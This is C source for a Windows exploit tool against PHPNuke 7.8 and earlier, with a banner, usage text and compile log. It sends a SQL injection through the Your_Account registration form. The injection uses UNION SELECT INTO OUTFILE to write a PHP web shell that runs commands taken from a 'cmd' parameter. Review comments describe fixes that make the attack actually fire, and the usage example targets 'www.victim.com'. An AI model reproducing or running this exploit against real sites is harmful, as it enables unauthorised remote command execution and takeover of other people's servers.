/*
____ ____ __
| | | | | | | /
| | | | | |___/ \
| | --- | |----| | \ \
|____| |____ | | |____| __/
Copyright (C) 2006 Untruth Labs
--------------------------------------------------------------------------------
Critical SQL Injection PHPNuke <= 7.8 - Your_Account
found by sp3x from www.securityreason.com
This exploit is based on this exploit:
http://securityreason.com/achievement_exploitalert/7
--------------------------------------------------------------------------------
recoded for windows (winsock): by unitedbr Date: 17.02.2006
Compiled in VC++
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>cl phpnuke78.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
phpnuke78.cpp
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
/out:phpnuke78.exe
phpnuke78.obj
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>
--------------------------------------------------------------------------------
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>phpnuke78
############################################################
# Untruth Labs presents #
# #
# EXPLOIT for PHPNuke <= 7.8 #
# Original code by: sp3x - Date: 16.02.2006 #
# http://securityreason.com/achievement_exploitalert/7 #
# #
# Recoded for windows: by unitedbr #
# Date: 17.02.2006 #
############################################################
Usage :
phpnuke78 HOST /[path_phpnuke] [s_directory]
HOST - Host where is phpnuke example: localhost
[path_phpnuke] - PHPNuke directory
[s_directory] - absolute path of the FILE the PHP shell is written to on the target (it is a file, not a directory; MySQL's INTO OUTFILE creates it, so the MySQL server must be able to write there and the path must be inside the web root to be reachable)
Example :
phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell.php
After this go to http://www.victim.com/phpnuke/html/shell.php?cmd=ls (the dropped shell reads the "cmd" query parameter, see usage() and the payload below)
C:\@Pastinha\Area_de_Testes\cpp\phpnuke7.8>
--------------------------------------------------------------------------------
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#define PORT 80
void usage(void);
void sqlinj(SOCKET sock, char *argv[]);
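/*
 * Entry point: resolve and connect to argv[1]:PORT, fire the injection
 * request (sqlinj) and print where the dropped shell should be reachable.
 *
 * argv[1]  target host name or IP
 * argv[2]  web path of the PHPNuke install (expected to end with '/')
 * argv[3]  absolute file path on the target that the shell is written to
 *
 * Returns 0 after the request was sent, EXIT_FAILURE on any setup error.
 *
 * Fixes relative to the original main():
 *   - sqlinj() was defined but never called, so the program only opened
 *     and closed a TCP connection and never sent the exploit.
 *   - closesocket() now runs before WSACleanup() (the original order is
 *     reversed, and the socket was leaked on the resolve-failure path).
 *   - the hostent is checked to be an AF_INET address of the right length
 *     before it is memcpy'd into sin_addr.
 *   - WSAGetLastError() returns int, so it is printed with %d (was %ld).
 */
int main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET sock;
    struct hostent *he;
    struct sockaddr_in addr;
    const char *shell_name;

    /* usage() terminates the process, so nothing below runs on bad args. */
    if (argc != 4)
        usage();

    /* WSAStartup() returns zero on success. */
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        printf("[x] Error at WSAStartup()\n");
        return EXIT_FAILURE;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("\n[x] Creating socket error: %d [FAILED]\n", WSAGetLastError());
        WSACleanup();
        return EXIT_FAILURE;
    }
    printf("\n[!] Creating socket [OK]\n");

    /* Resolve the target; only an IPv4 answer fits the sockaddr_in below. */
    he = gethostbyname(argv[1]);
    if (he == NULL || he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof(addr.sin_addr)) {
        printf("[x] Resolving \"%s\" [FAILED]\n", argv[1]);
        closesocket(sock);
        WSACleanup();
        return EXIT_FAILURE;
    }
    printf("[!] Resolving \"%s\" [OK]\n", argv[1]);

    memset(&addr, 0, sizeof(addr));
    memcpy(&addr.sin_addr, he->h_addr, sizeof(addr.sin_addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR) {
        printf("[x] Connecting at %s [FAILED]\n", argv[1]);
        closesocket(sock);
        WSACleanup();
        return EXIT_FAILURE;
    }
    printf("[!] Connecting at %s [OK]\n", argv[1]);

    /* The actual exploit request; sqlinj() exits itself on send failure. */
    sqlinj(sock, argv);

    /* The shell URL is only a guess: it assumes argv[3] lives inside the
       web root mapped at argv[2].  Strip the directory part of argv[3]
       (either separator style) to name the file. */
    shell_name = strrchr(argv[3], '/');
    if (shell_name == NULL)
        shell_name = strrchr(argv[3], '\\');
    shell_name = (shell_name != NULL) ? shell_name + 1 : argv[3];
    printf("[!] Now check the shell (assumes %s is inside the web root)\n"
           "[!] http://%s%s%s?cmd=ls\n\n", argv[3], argv[1], argv[2], shell_name);

    closesocket(sock);
    WSACleanup();
    return 0;
}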
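/*
 * Print the banner and the argument description, then terminate.
 *
 * main() calls this only when the command line is wrong, so the process
 * exits with EXIT_FAILURE (the original used EXIT_SUCCESS, which made a
 * bad invocation look like a successful run to any calling script).  The
 * description of the third argument is corrected: it is the path of the
 * file MySQL writes the shell to, not a directory, and the query parameter
 * is "cmd" to match the dropped shell's $_GET[cmd].  Never returns.
 */
void usage(void)
{
    printf("\n\n############################################################\n"
           "# Untruth Labs presents #\n"
           "# #\n"
           "# EXPLOIT for PHPNuke <= 7.8 #\n"
           "# Original code by: sp3x - Date: 16.02.2006 #\n"
           "# http://securityreason.com/achievement_exploitalert/7 #\n"
           "# #\n"
           "# Recoded for windows: by unitedbr #\n"
           "# Date: 17.02.2006 #\n"
           "############################################################\n\n"
           " Usage : \n"
           " phpnuke78 HOST /[path_phpnuke] [s_directory]\n\n"
           " HOST - host running PHPNuke, e.g. localhost\n"
           " [path_phpnuke] - web path of the PHPNuke install, with trailing slash\n"
           " [s_directory] - absolute path of the FILE the PHP shell is written to\n"
           "                 (created by MySQL INTO OUTFILE: must be writable by the\n"
           "                  MySQL server and inside the web root to be reachable)\n\n"
           " Example :\n\n"
           " phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell.php\n"
           " After this go to http://www.victim.com/phpnuke/html/shell.php?cmd=ls \n\n");
    exit(EXIT_FAILURE);
}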
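/*
 * Write all of buf to sock.
 *
 * Returns 0 once every byte was accepted by send(), -1 on a send error or
 * a zero-length send (treated as a dead connection).
 */
static int send_all(SOCKET sock, const char *buf, size_t len)
{
    while (len > 0) {
        int n = send(sock, buf, (int)len, 0);
        if (n == SOCKET_ERROR || n <= 0)
            return -1;
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Send the Your_Account "new user" POST whose username field carries the
 * SQL injection.  The injected UNION ... INTO OUTFILE makes MySQL write a
 * one-line PHP shell to argv[3]; the shell runs $_GET[cmd] via system().
 *
 * sock  connected TCP socket to the target web server
 * argv  program arguments: argv[1] host, argv[2] PHPNuke web path,
 *       argv[3] absolute path of the file to create on the target
 *
 * On any failure the socket is closed and the process exits with
 * EXIT_FAILURE; otherwise the first line of the server's reply is printed.
 *
 * Fixes relative to the original:
 *   - fdopen() on a Winsock SOCKET is invalid on Windows (a SOCKET is not a
 *     CRT file descriptor), so the request is written with send().
 *   - header lines end in CRLF, the Cookie header is sent with the other
 *     headers instead of after the body, and Content-Length is the real
 *     body length rather than a hard-coded 264 + strlen(argv[3]).
 *   - the "___FCKpd___0" extraction artifact in the payload is restored to
 *     the $_GET[cmd] superglobal that usage() and the payload refer to.
 *
 * NOTE(review): the payload relies on the single quote in `username`
 * reaching MySQL unescaped and on the DB account having the FILE privilege
 * with a path writable by mysqld; none of that is checked here, so a 200
 * reply does not prove the shell was written.
 */
void sqlinj(SOCKET sock, char *argv[])
{
    /* POST body, split around its only variable part (the output path). */
    static const char body_head[] =
        "name=Your_Account&op=new user&user_email=unitedbr@u-labs.org&"
        "user_password=hackme&user_password2=hackme&username="
        "s'/**/UNION/**/SELECT/**/'<? echo \"Untruth Shell\";system($_GET[cmd]);'"
        "/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'";
    static const char body_tail[] = "'/*";
    /* Headers: %s = POST path, Host, Referer host, Referer path; %lu = length. */
    static const char hdr_fmt[] =
        "POST %s HTTP/1.0\r\n"
        "Connection: Keep-Alive\r\n"
        "Pragma: no-cache\r\n"
        "Cache-control: no-cache\r\n"
        "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
        "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\r\n"
        "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\r\n"
        "Accept-Language: en\r\n"
        "Host: %s\r\n"
        "Referer: http://%s%s?name=Your_Account&op=new user\r\n"
        "User-Agent: SecurityReason - [SR]\r\n"
        "Cookie: lang=english\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %lu\r\n"
        "\r\n";
    char request[4096];
    char reply[256];
    size_t host_len = strlen(argv[1]);
    size_t path_len = strlen(argv[2]);
    size_t out_len = strlen(argv[3]);
    size_t body_len = (sizeof(body_head) - 1) + out_len + (sizeof(body_tail) - 1);
    /* Upper bound on the formatted request: every byte of the format text,
       every argument (host and path appear twice), 20 digits for the
       Content-Length, the body and the NUL sprintf writes.  Refusing here
       is what makes the sprintf below safe. */
    size_t need = sizeof(hdr_fmt) + 2 * host_len + 2 * path_len + 20 + body_len + 1;
    int len;
    int got;

    if (need > sizeof(request)) {
        printf("[x] Arguments too long for the request buffer [FAILED]\n\n");
        closesocket(sock);
        exit(EXIT_FAILURE);
    }

    len = sprintf(request, hdr_fmt, argv[2], argv[1], argv[1], argv[2],
                  (unsigned long)body_len);
    memcpy(request + len, body_head, sizeof(body_head) - 1);
    len += (int)(sizeof(body_head) - 1);
    memcpy(request + len, argv[3], out_len);
    len += (int)out_len;
    memcpy(request + len, body_tail, sizeof(body_tail) - 1);
    len += (int)(sizeof(body_tail) - 1);

    if (send_all(sock, request, (size_t)len) != 0) {
        printf("[x] Sending exploit: %d [FAILED]\n\n", WSAGetLastError());
        closesocket(sock);
        exit(EXIT_FAILURE);
    }
    printf("[!] Sending exploit [OK]\n");

    /* Show the status line so the operator sees whether the request was
       accepted at all (it says nothing about whether the file was written). */
    got = recv(sock, reply, (int)sizeof(reply) - 1, 0);
    if (got > 0) {
        reply[got] = '\0';
        reply[strcspn(reply, "\r\n")] = '\0';
        printf("[!] Server replied: %s\n\n", reply);
    } else {
        printf("[x] No reply from server\n\n");
    }
}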